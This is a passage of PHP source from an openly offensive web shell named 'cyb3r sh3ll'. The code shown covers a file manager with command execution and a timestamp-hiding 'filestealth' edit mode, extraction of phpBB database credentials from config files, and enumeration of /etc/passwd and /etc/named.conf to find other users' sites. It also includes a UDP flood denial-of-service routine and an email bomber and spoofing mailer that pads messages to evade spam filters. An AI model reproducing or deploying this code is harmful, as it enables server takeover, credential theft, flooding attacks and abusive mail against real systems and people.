4391 array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
4392
4393 array("SDB","sdb"),
4394
4395 array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
4396
4397 array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
4398
4399 array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
4400
4401 array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
4402
4403 array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
4404
4405 );
4406
4407 echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
4408
4409 foreach($arr as $t)
4410
4411 {
4412
4413 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
4414
4415 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
4416
4417 else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
4418
4419 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
4420
4421 }
4422
4423 echo "<hr size=\"1\" noshade>";
4424
4425 if ($ft == "info")
4426
4427 {
4428
4429 echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
4430
4431 if (!$win)
4432
4433 {
4434
4435 echo "<tr><td><b>Owner/Group</b></td><td> ";
4436
4437 $ow = posix_getpwuid(fileowner($d.$f));
4438
4439 $gr = posix_getgrgid(filegroup($d.$f));
4440
4441 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
4442
4443 }
4444
4445 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
4446
4447 $fi = fopen($d.$f,"rb");
4448
4449 if ($fi)
4450
4451 {
4452
4453 if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
4454
4455 else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
4456
4457 $n = 0;
4458
4459 $a0 = "00000000<br>";
4460
4461 $a1 = "";
4462
4463 $a2 = "";
4464
4465 for ($i=0; $i<strlen($str); $i++)
4466
4467 {
4468
4469 $a1 .= sprintf("%02X",ord($str[$i]))." ";
4470
4471 switch (ord($str[$i]))
4472
4473 {
4474
4475 case 0: $a2 .= "<font>0</font>"; break;
4476
4477 case 32:
4478
4479 case 10:
4480
4481 case 13: $a2 .= "&nbsp;"; break;
4482
4483 default: $a2 .= htmlspecialchars($str[$i]);
4484
4485 }
4486
4487 $n++;
4488
4489 if ($n == $hexdump_rows)
4490
4491 {
4492
4493 $n = 0;
4494
4495 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
4496
4497 $a1 .= "<br>";
4498
4499 $a2 .= "<br>";
4500
4501 }
4502
4503 }
4504
4505 //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
4506
4507 echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
4508
4509 }
4510
4511 $encoded = "";
4512
4513 if ($base64 == 1)
4514
4515 {
4516
4517 echo "<b>Base64 Encode</b><br>";
4518
4519 $encoded = base64_encode(file_get_contents($d.$f));
4520
4521 }
4522
4523 elseif($base64 == 2)
4524
4525 {
4526
4527 echo "<b>Base64 Encode + Chunk</b><br>";
4528
4529 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
4530
4531 }
4532
4533 elseif($base64 == 3)
4534
4535 {
4536
4537 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
4538
4539 $encoded = base64_encode(file_get_contents($d.$f));
4540
4541 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
4542
4543 }
4544
4545 elseif($base64 == 4)
4546
4547 {
4548
4549 $text = file_get_contents($d.$f);
4550
4551 $encoded = base64_decode($text);
4552
4553 echo "<b>Base64 Decode";
4554
4555 if (base64_encode($encoded) != $text) {echo " (failed)";}
4556
4557 echo "</b><br>";
4558
4559 }
4560
4561 if (!empty($encoded))
4562
4563 {
4564
4565 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
4566
4567 }
4568
4569 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
4570
4571<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
4572
4573<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
4574
4575<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
4576
4577<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
4578
4579<P>";
4580
4581 }
4582
4583 elseif ($ft == "html")
4584
4585 {
4586
4587 if ($white) {@ob_clean();}
4588
4589 echo $r;
4590
4591 if ($white) {cyb3rexit();}
4592
4593 }
4594
4595 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
4596
4597 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
4598
4599 elseif ($ft == "phpsess")
4600
4601 {
4602
4603 echo "<pre>";
4604
4605 $v = explode("|",$r);
4606
4607 echo $v[0]."<br>";
4608
4609 var_dump(unserialize($v[1]));
4610
4611 echo "</pre>";
4612
4613 }
4614
4615 elseif ($ft == "exe")
4616
4617 {
4618
4619 $ext = explode(".",$f);
4620
4621 $c = count($ext)-1;
4622
4623 $ext = $ext[$c];
4624
4625 $ext = strtolower($ext);
4626
4627 $rft = "";
4628
4629 foreach($exeftypes as $k=>$v)
4630
4631 {
4632
4633 if (in_array($ext,$v)) {$rft = $k; break;}
4634
4635 }
4636
4637 $cmd = str_replace("%f%",$f,$rft);
4638
4639 echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
4640
4641 }
4642
4643 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
4644
4645 elseif ($ft == "code")
4646
4647 {
4648
4649 if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
4650
4651 {
4652
4653 $arr = explode("\n",$r);
4654
4655 if (count($arr == 18))
4656
4657 {
4658
4659 include($d.$f);
4660
4661 echo "<b>phpBB configuration is detected in this file!<br>";
4662
4663 if ($dbms == "mysql4") {$dbms = "mysql";}
4664
4665 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
4666
4667 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";}
4668
4669 echo "Parameters for manual connect:<br>";
4670
4671 $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
4672
4673 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
4674
4675 echo "</b><hr size=\"1\" noshade>";
4676
4677 }
4678
4679 }
4680
4681 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
4682
4683 if (!empty($white)) {@ob_clean();}
4684
4685 highlight_file($d.$f);
4686
4687 if (!empty($white)) {cyb3rexit();}
4688
4689 echo "</div>";
4690
4691 }
4692
4693 elseif ($ft == "download")
4694
4695 {
4696
4697 @ob_clean();
4698
4699 header("Content-type: application/octet-stream");
4700
4701 header("Content-length: ".filesize($d.$f));
4702
4703 header("Content-disposition: attachment; filename=\"".$f."\";");
4704
4705 echo $r;
4706
4707 exit;
4708
4709 }
4710
4711 elseif ($ft == "notepad")
4712
4713 {
4714
4715 @ob_clean();
4716
4717 header("Content-type: text/plain");
4718
4719 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
4720
4721 echo($r);
4722
4723 exit;
4724
4725 }
4726
4727 elseif ($ft == "img")
4728
4729 {
4730
4731 $inf = getimagesize($d.$f);
4732
4733 if (!$white)
4734
4735 {
4736
4737 if (empty($imgsize)) {$imgsize = 20;}
4738
4739 $width = $inf[0]/100*$imgsize;
4740
4741 $height = $inf[1]/100*$imgsize;
4742
4743 echo "<center><b>Size:</b>&nbsp;";
4744
4745 $sizes = array("100","50","20");
4746
4747 foreach ($sizes as $v)
4748
4749 {
4750
4751 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
4752
4753 if ($imgsize != $v ) {echo $v;}
4754
4755 else {echo "<u>".$v."</u>";}
4756
4757 echo "</a>&nbsp;&nbsp;&nbsp;";
4758
4759 }
4760
4761 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
4762
4763 }
4764
4765 else
4766
4767 {
4768
4769 @ob_clean();
4770
4771 $ext = explode($f,".");
4772
4773 $ext = $ext[count($ext)-1];
4774
4775 header("Content-type: ".$inf["mime"]);
4776
4777 readfile($d.$f);
4778
4779 exit;
4780
4781 }
4782
4783 }
4784
4785 elseif ($ft == "edit")
4786
4787 {
4788
4789 if (!empty($submit))
4790
4791 {
4792
4793 if ($filestealth) {$stat = stat($d.$f);}
4794
4795 $fp = fopen($d.$f,"w");
4796
4797 if (!$fp) {echo "<b>Can't write to file!</b>";}
4798
4799 else
4800
4801 {
4802
4803 echo "<b>Saved!</b>";
4804
4805 fwrite($fp,$edit_text);
4806
4807 fclose($fp);
4808
4809 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
4810
4811 $r = $edit_text;
4812
4813 }
4814
4815 }
4816
4817 $rows = count(explode("\r\n",$r));
4818
4819 if ($rows < 10) {$rows = 10;}
4820
4821 if ($rows > 30) {$rows = 30;}
4822
4823 echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
4824
4825 }
4826
4827 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
4828
4829 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
4830
4831 }
4832
4833}
4834
4835if ($act == "about")
4836{
4837echo '<table align="center"><tr><td><b><font color="orange">Script:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>
4838Name: cyb3r sh3ll<br>Version: '.$shver.'</font><br/><br/>Author:<br>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br>
4839Name: cyb3r 9l4d!470r (Cyber Gladiator)<br>Country: India<br>Website: ????...<br>Email: cyb3r.gladiat0r@gmail.com
4840<a href="mailto:cyb3r.gladiat0r@gmail.com"></a><br/><br/><font color="green">Greetings:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>r45c4l bro you are my source of inspiration.<br/>r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.<br/>Thanks all who report bugs and send to my email id.</font><br/></b></td></tr></table>';
4841}
4842
4843if ($act == "dos")
4844{
4845?><center><br><br><img src="http://s15.postimage.org/5q2io54zv/dos.png"><br>
4846<b>Server IP:</b> <font color="green"><?php echo $_SERVER["SERVER_ADDR"]; ?></font><br><br>
4847<b>Your IP:</b> <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
4848<form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="ddos">
4849IP:
4850<input type="text" name="ip" size="15" maxlength="15" class="main" value = "127.0.0.1" onblur = "if ( this.value=='' ) this.value = '127.0.0.1';" onfocus = " if ( this.value == '127.0.0.1' ) this.value = '';">
4851&nbsp;&nbsp;&nbsp;&nbsp;Time:
4852<input type="text" name="time" size="14" maxlength="20" class="main" value = "10" onblur = "if ( this.value=='' ) this.value = '10';" onfocus = " if ( this.value == '10' ) this.value = '';">
4853&nbsp;&nbsp;&nbsp;&nbsp;Port:
4854<input type="text" name="port" size="5" maxlength="5" class="main" value = "80" onblur = "if ( this.value=='' ) this.value = '80';" onfocus = " if ( this.value == '80' ) this.value = '';">
4855<br><br>
4856<input type="submit" value=" Start the Attack---> ">
4857<br><br>
4858<center>After initiating the DoS attack, please wait while the browser loads.</center></form></center><?php
4859}
4860
4861if ($act == "ddos")
4862{
4863$packets = 0;
4864$ip = $_POST['ip'];
4865$rand = $_POST['port'];
4866set_time_limit(0);
4867ignore_user_abort(FALSE);
4868
4869$exec_time = $_POST['time'];
4870
4871$time = time();
4872echo "<script>alert('Dos Completed!');</script>";
4873print "Flooded: $ip on port $rand <br><br>";
4874$max_time = $time+$exec_time;
4875
4876
4877
4878for($i=0;$i<65535;$i++){
4879 $out .= "X";
4880}
4881while(1){
4882$packets++;
4883 if(time() > $max_time){
4884 break;
4885 }
4886
4887 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
4888 if($fp){
4889 fwrite($fp, $out);
4890 fclose($fp);
4891 }
4892}
4893echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
4894}
4895
4896if ($act == "localdomain")
4897{
4898echo "<br><center><a href=\"".$surl."act=local\" ><b><u>Sites on this server.</u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=readable\" ><b><u>List of Users.</u></b></a></center><br>";
4899}
4900
4901 if ($act == "local")
4902 {
4903 //radable public_html
4904 $file = @implode(@file("/etc/named.conf"));
4905 if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
4906 preg_match_all("#named/(.*?).db#",$file ,$r);
4907 $domains = array_unique($r[1]);
4908
4909 function check()
4910 {
4911 (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):"";
4912 }
4913
4914 check();
4915
4916 echo "<table align=center border=1 width=59% cellpadding=5>
4917 <tr><td colspan=2>[+] Here : [ <b>".count($domains)."</b> ] Domain ...</td></tr>
4918 <tr><td><b>List of Domains</b></td><td><b>List of Users</b></td></tr>";
4919
4920 foreach($domains as $domain)
4921 {
4922 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
4923 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
4924 }
4925
4926 echo "</table>";
4927//radable public_html
4928 }
4929
4930 if ($act == "readable")
4931 {
4932 //entries in passwd file
4933($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
4934set_time_limit(0);
4935###################
4936@$passwd = fopen('/etc/passwd','r');
4937if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
4938$pub = array();
4939$users = array();
4940$conf = array();
4941$i = 0;
4942while(!feof($passwd))
4943{
4944$str = fgets($passwd);
4945if ($i > 35)
4946{
4947$pos = strpos($str,':');
4948$username = substr($str,0,$pos);
4949$dirz = '/home/'.$username.'/public_html/';
4950if (($username != ''))
4951{
4952if (is_readable($dirz))
4953{
4954array_push($users,$username);
4955array_push($pub,$dirz);
4956}
4957}
4958}
4959$i++;
4960}
4961###################
4962echo '<br><br><textarea class="output" >';
4963echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
4964echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
4965echo "[~] Searching for passwords in config files...\n\n";
4966foreach ($users as $user)
4967{
4968$path = "/home/$user/public_html/";
4969echo "$path \n";
4970}
4971echo "\n";
4972echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <- that's on the menu -> Explorer \n";
4973echo "[+] Done ...\n";
4974echo '</textarea><br><br>Coded by <b>cyb3r 9l4d!470r</b> <a href=#/>Homepage</a>';
4975
4976
4977 }
4978
4979
4980 if ($act == "mailer")
4981 {
4982 ?> <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%" border=1>
4983 <tr> <!-- 1 -->
4984 <td valign="top" width="33%" ><p align="center"><b>(: E-Mail Bomber :)</b></p></td>
4985 <td valign="top" width="33%" ><p align="center"><b>[: Mass Mailer :]</b></p></td>
4986 <td valign="top" ><p align="center"><b>{: Anonymous Mailer :}</b></p></td>
4987 </tr>
4988 <tr><!-- 2 -->
4989 <td valign="top" ><center>
4990 <?php
4991 if(
4992 isset($_POST['to']) &&
4993 isset($_POST['subject']) &&
4994 isset($_POST['message']) &&
4995 isset($_POST['times']) &&
4996 $_POST['to'] != '' &&
4997 $_POST['subject'] != '' &&
4998 $_POST['message'] != '' &&
4999 $_GET['act'] =='mailbomber' &&
5000 $_POST['times'] != ''
5001 )
5002 {
5003 $times = $_POST['times'];
5004 while($times--)
5005 {
5006 if(isset($_POST['padding']))
5007 {
5008 $fromPadd = rand(0,9999);
5009 $subjectPadd = " -- ID : ".rand(0,9999999);
5010 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
5011
5012 }
5013 $from = "your$fromPadd@email.id";
5014 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
5015 {
5016 $error = 1;
5017 echo "<font color='red'>Some Error Occured!</font>";
5018 break;
5019 }
5020 }
5021 if($error != 1)
5022 { echo "<font color='green'>Mail(s) Sent!</font>"; }
5023 }
5024 else
5025 {
5026 ?>
5027 <form method="post" action ="<?php echo $surl."act=mailbomber";?>">
5028 <table>
5029 <tr>
5030 <td >
5031 To
5032 </td>
5033 <td>
5034 <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com,victim@target.com,victim2@target.com';"/>
5035 </td>
5036 </tr>
5037
5038 <tr>
5039 <td class="title">
5040 Subject
5041 </td>
5042 <td>
5043 <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
5044 </td>
5045 </tr>
5046 <tr>
5047 <td >
5048 No. of Times
5049 </td>
5050 <td>
5051 <input name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
5052 </td>
5053 </tr>
5054
5055 <tr>
5056 <td>
5057
5058 Pad your message (Less spam detection)
5059
5060 </td>
5061 <td>
5062
5063 <input type="checkbox" name="padding"/>
5064
5065 </td>
5066 </tr>
5067 <tr>
5068 <td >
5069 <textarea name="message" cols="25" rows="5" value="cyb3r-sh3ll Rocks!!.." onfocus="if(this.value == 'cyb3r-sh3ll Rocks!! ..')this.value = '';" onblur="if(this.value=='')this.value='cyb3r-sh3ll Rocks!! ..';">cyb3r-sh3ll Rocks!!</textarea>
5070 </td>
5071 <td >
5072 <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
5073 </td>
5074 </tr>
5075
5076
5077
5078 </table>
5079 </form>
5080 <?php
5081 }
5082 ?>
5083
5084 </center></td>
5085
5086 <td valign="top"><center>
5087 <?PHP
5088 if(
5089 isset($_POST['to']) &&
5090 isset($_POST['from']) &&
5091 isset($_POST['subject']) &&
5092 $_GET['act'] =='massmailer' &&
5093 isset($_POST['message'])
5094 )
5095 {
5096
5097 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
5098 {
5099 echo "<font color='green'>Mail Sent!</font>";
5100 }
5101 else
5102 {
5103 echo "<font color='red'>Some Error Occured!</font>";
5104 }
5105 }
5106 else
5107 {
5108 ?>
5109 <form method="POST" action="<?php echo $surl."act=massmailer";?>">
5110
5111 <table >
5112 <tr>
5113 <td >
5114 From
5115 </td>
5116 <td>
5117 <input name="from" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/>
5118 </td>
5119 </tr>
5120
5121 <tr>
5122 <td >
5123 To
5124 </td>
5125 <td>
5126 <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@target.com,victim2@target.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com';"/>
5127 </td>
5128 </tr>
5129
5130 <tr>
5131 <td class="title">
5132 Subject
5133 </td>
5134 <td>
5135 <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
5136 </td>
5137 </tr>
5138
5139
5140 <tr>
5141 <td >
5142 <textarea name="message" cols="25" rows="5" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
5143 </td>
5144 <td >
5145 <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
5146 </td>
5147 </tr>
5148
5149
5150
5151 </table>
5152 </form>
5153 <?php
5154 }
5155
5156?>
5157 </center>
5158 </td>
5159
5160 <td ><center>
5161
5162 <form action="" method="post" enctype="multipart/form-data">
5163 <table border="0" class="full">
5164 <tr><td class="taright"><label for="fromname" accesskey="r" class="sbold">F<span class="underline">r</span>om Name:</label></td><td colspan="2"><input type="text" id="fromname" name="fromname" maxlength="100" class="full" /><label for="from" accesskey="f" class="sbold"><span class="underline">F</span>rom E-mail:</label></td><td colspan="2"><input type="text" id="from" name="from" maxlength="100" class="full" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/></td></tr>
5165
5166 <tr><td class="taright"><label for="rcpt" accesskey="o" class="sbold">T<span class="underline">o</span>:</label></td><td colspan="2"><input type="text" id="rcpt" name="rcpt" maxlength="100" class="full" /><label for="subject" accesskey="j" class="sbold">Sub<span class="underline">j</span>ect:</label></td><td colspan="2"><input type="text" id="subject" name="subject" maxlength="100" class="full" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';"/></td></tr>
5167
5168 <tr><td class="taright"><label for="reply" accesskey="p" class="sbold opt">Re<span class="underline">p</span>ly-To:</label></td><td colspan="2"><input type="text" id="reply" name="reply" maxlength="100" class="full" /><label for="errors" accesskey="s" class="sbold opt">Error<span class="underline">s</span>-To:</label></td><td colspan="2"><input type="text" id="errors" name="errors" maxlength="100" class="full" /></td></tr>
5169
5170 <tr><td class="taright"><label for="bcc" accesskey="b" class="sbold opt"><span class="underline">B</span>CC:</label></td><td colspan="2"><input type="text" id="bcc" name="bcc" maxlength="100" class="full" /><label for="attachment" accesskey="t" class="sbold opt">A<span class="underline">t</span>tachment:</label></td><td colspan="2"><input type="file" id="attachment" name="attachment" class="full" /></td></tr>
5171
5172 <tr><td class="taright sbold opt">Priority:</td><td colspan="2"><input type="radio" name="importance" id="lowest" value="lowest" /><label for="lowest" accesskey="w">&nbsp;Lo<span class="underline">w</span></label><input type="radio" name="importance" id="normal" value="normal" class="rbtn" checked="checked" /><label for="normal" accesskey="m">&nbsp;Nor<span class="underline">m</span>al</label><input type="radio" name="importance" id="highest" value="highest" class="rbtn" /><label for="highest" accesskey="g">&nbsp;Hi<span class="underline">g</span>h</label></td></tr>
5173
5174 <tr><td class="vatop taright"><label for="xmailer" accesskey="l" class="sbold opt"><span id="mailer">X-Mai<span class="underline">l</span>er:</span></label></td><td colspan="2">
5175 <select name="xmailer" id="xmailer">
5176 <option value="0" selected="selected">- none -</option>
5177 <option value="1">Apple Mail</option>
5178 <option value="2">ColdFusion MX Application Server</option>
5179 <option value="3">E-Messenger</option>
5180 <option value="4">KMail</option>
5181
5182 <option value="5">Lotus Notes</option>
5183 <option value="6">Microsoft Office Outlook</option>
5184 <option value="7">Microsoft Outlook Express</option>
5185 <option value="8">Microsoft Outlook IMO</option>
5186 <option value="9">Microsoft Windows Live Mail</option>
5187 <option value="10">Microsoft Windows Mail</option>
5188 <option value="11">Mozilla Thunderbird</option>
5189 <option value="12">Novell GroupWise</option>
5190 <option value="13">Novell GroupWise Internet Agent</option>
5191 <option value="14">QUALCOMM Windows Eudora Version</option>
5192 <option value="15">The Bat!</option>
5193 <option value="16">YahooMailClassic YahooMailWebService</option>
5194 <option value="99">Custom...</option>
5195 </select>
5196
5197 </td></tr>
5198
5199 <tr><td class="taright"><label for="date" accesskey="d" class="sbold opt"><span class="underline">D</span>ate:</label></td><td colspan="2"><input type="text" id="date" name="date" maxlength="50" value="Thu, 10 Nov 2011 18:41:04 +0100" class="datewidth" />&nbsp;<input type="checkbox" id="current" name="current" checked="checked" /><label for="current" accesskey="u">&nbsp;C<span class="underline">u</span>rrent</label></td></tr>
5200 <tr><td class="taright"><label for="charset" accesskey="a" class="sbold opt">Ch<span class="underline">a</span>rset:</label></td><td class="cchs">
5201 <select name="charset" id="charset" class="full">
5202 <option value="big5">big5</option>
5203 <option value="euc-kr">euc-kr</option>
5204 <option value="iso-2202-jp">iso-2202-jp</option>
5205 <option value="iso-8859-1">iso-8859-1</option>
5206 <option value="iso-8859-2">iso-8859-2</option>
5207 <option value="iso-8859-3">iso-8859-3</option>
5208 <option value="iso-8859-4">iso-8859-4</option>
5209 <option value="iso-8859-5">iso-8859-5</option>
5210 <option value="iso-8859-6">iso-8859-6</option>
5211 <option value="iso-8859-7">iso-8859-7</option>
5212 <option value="iso-8859-8">iso-8859-8</option>
5213 <option value="koi8-r">koi8-r</option>
5214 <option value="shift-jis">shift-jis</option>
5215 <option value="utf-8" selected="selected">utf-8</option>
5216 <option value="windows-1250">windows-1250</option>
5217 <option value="windows-1251">windows-1251</option>
5218 <option value="windows-1252">windows-1252</option>
5219 <option value="windows-1253">windows-1253</option>
5220 <option value="windows-1254">windows-1254</option>
5221 <option value="windows-1255">windows-1255</option>
5222 <option value="windows-1256">windows-1256</option>
5223 <option value="windows-1257">windows-1257</option>
5224 <option value="windows-1258">windows-1258</option>
5225 <option value="windows-874">windows-874</option>
5226 <option value="x-euc">x-euc</option>
5227 <option value="99">Custom...</option>
5228 </select>
5229 </td><td><input type="text" name="mycharset" maxlength="50" class="full" /></td></tr>
5230 <tr><td class="taright sbold opt">Content-Type:</td><td colspan="2"><input type="radio" name="ctype" id="plain" value="plain" checked="checked" /><label for="plain" accesskey="n">&nbsp;text/plai<span class="underline">n</span></label><input type="radio" name="ctype" id="html" value="html" class="rbtn" /><label for="html" accesskey="h" id="mrk">&nbsp;text/<span class="underline">h</span>tml</label><input type="hidden" name="rte" value="0" /></td></tr>
